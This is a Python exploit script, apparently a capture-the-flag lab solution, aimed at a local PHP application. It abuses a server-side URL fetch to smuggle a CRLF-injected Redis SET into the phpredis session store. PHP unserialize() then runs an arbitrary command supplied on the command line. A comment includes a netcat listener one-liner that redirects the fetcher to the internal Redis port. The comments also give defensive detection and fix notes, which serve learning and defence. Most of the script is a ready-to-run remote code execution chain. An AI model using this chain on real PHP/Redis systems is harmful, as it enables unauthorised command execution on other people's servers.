# CTF lab write-up script.  Chain: a server-side URL fetch in the target app
# is abused to smuggle a Redis `SET` into the phpredis session store, so the
# next page load unserializes attacker-controlled session data.  Only the
# local instance in BASE_URL is contacted.  From a defender's view the chain
# needs all three of: an outbound fetcher that follows redirects into internal
# hosts, a Redis reachable from the app without AUTH, and session data that is
# unserialize()d without validation -- removing any one of them breaks it.
import sys
import subprocess
import requests
import secrets
from urllib.parse import quote_plus

# Local lab instance only.
BASE_URL = 'http://127.0.0.1:10004'

# The command to embed in the payload is the single CLI argument.
if len(sys.argv) < 2:
    print('Usage: {} <command>'.format(sys.argv[0]))
    sys.exit(1)
command = sys.argv[1]

# Payload generation is delegated to a PHP helper so the serialized object
# matches the target's class layout; presumably it writes `sess_test`, which
# is read next -- confirm against gen_serialized.php.  Its exit status is
# not checked, so a failed helper leaves a stale/missing file.
subprocess.call(['php', 'gen_serialized.php', command])
# NOTE(review): the file object returned by open() is never closed; this
# relies on CPython refcounting to release the handle.
serialized = repr(open('sess_test', 'r').read())
# repr() yields a single-quoted, backslash-escaped Python literal.  Escape the
# embedded double quotes, then turn single quotes into double quotes --
# presumably so Redis' inline protocol reads the value as one quoted
# argument; confirm if the payload contains quotes of either kind.
serialized = serialized.replace('"', '\\"').replace("'", '"')
req = requests.Session()

# Login with throwaway random credentials; only the PHPSESSID cookie that
# comes back is needed, since it names the Redis key overwritten below.
req.post(BASE_URL+'/login.php', data={
    'username': secrets.token_urlsafe(),
    'password': secrets.token_urlsafe()
})
session_id = req.cookies['PHPSESSID']   # KeyError if login set no cookie
print("[+] PHPSESSID =", session_id)

# SSRF to set session.  The CRLF-separated lines end up on the Redis
# connection once the app's fetcher is redirected there (see the listener
# one-liner in the comment further down).  The "meow" / "Host: meow" lines
# are padding around the single SET that matters; it targets the phpredis
# session entry keyed by the PHPSESSID obtained above.
exploit = (
    "meow\r\n"
    f"SET PHPREDIS_SESSION:{session_id} {serialized}\r\n"
    "Host: meow\r\n"
)
# The `url` value is fetched server-side.  The listener in the comment below
# answers with a 302 to the internal Redis port, so the app's HTTP client
# presumably delivers the (decoded) path to Redis -- confirm the fetcher
# decodes before following.  Defensive notes: Redis logs showing HTTP verbs
# or unknown commands from the app host are the detection signal; refusing
# redirects to non-public addresses and enabling Redis AUTH are the fixes.
req.post(BASE_URL+"/update.php?mode=url", data={
    # while true ; do { echo -ne "HTTP/1.0 302 FOUND\r\nLocation: http://redis:6379\r\n\r\n" } | nc -lp 3000; done
    # NOTE(review): the single slash after `http:` is as in the original --
    # confirm it is intentional for the target's URL parser.
    "url": "http:/host:3000/aaa." + quote_plus(exploit)
})

# Deserialize & Execute command: loading any page reads the session back
# from Redis, which is presumably where the injected data is unserialized.
res = req.get(BASE_URL).text
# Output is scraped from between the first "<br>" and "<h2>Hello".  str.index
# raises ValueError if either marker is missing, i.e. when the chain did not
# fire -- that traceback is the failure signal here.
print("[+] Command executed:",
      res[res.index("<br>")+4: res.index("<h2>Hello")].strip())